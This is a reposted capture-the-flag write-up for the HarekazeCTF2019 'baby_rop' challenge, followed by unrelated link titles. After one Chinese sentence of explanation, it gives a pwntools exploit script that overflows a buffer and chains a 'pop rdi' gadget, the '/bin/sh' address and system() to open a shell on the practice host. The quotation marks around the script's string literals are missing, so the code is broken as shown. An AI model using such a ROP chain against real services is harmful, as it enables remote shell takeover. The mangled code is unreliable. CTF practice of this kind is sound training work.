[HarekazeCTF2019]baby_rop

Posted gaonuoqi

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[HarekazeCTF2019]baby_rop相关的知识,希望对你有一定的参考价值。

程序已经给了system和binsh ,用寄存器传参就可以了

from pwn import *

r=remote(node3.buuoj.cn,25737)
elf=ELF(./babyrop)
system_addr=elf.symbols[system]
binsh_addr=0x601048
rdi_addr=0x400683

payload=a*0x10+b*0x8+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+p64(0xdeadbeef) #system(/bin/sh)
r.sendline(payload)

r.interactive()

 

以上是关于[HarekazeCTF2019]baby_rop的主要内容,如果未能解决你的问题,请参考以下文章

2019中国古玩陶瓷艺术展(北京文博会)官网

文创展--北京文博会2019年北京展

软件安装管家office2019安装步骤

office2019如何激活?哪里有office2019激活方法

PyCharm 2019安装教程

CVPR-2020 AAAI2020 CVPR-2019 NIPS-2019 ICCV-2019 IJCAI-2019 论文超级大合集下载,整理好累,拿走不谢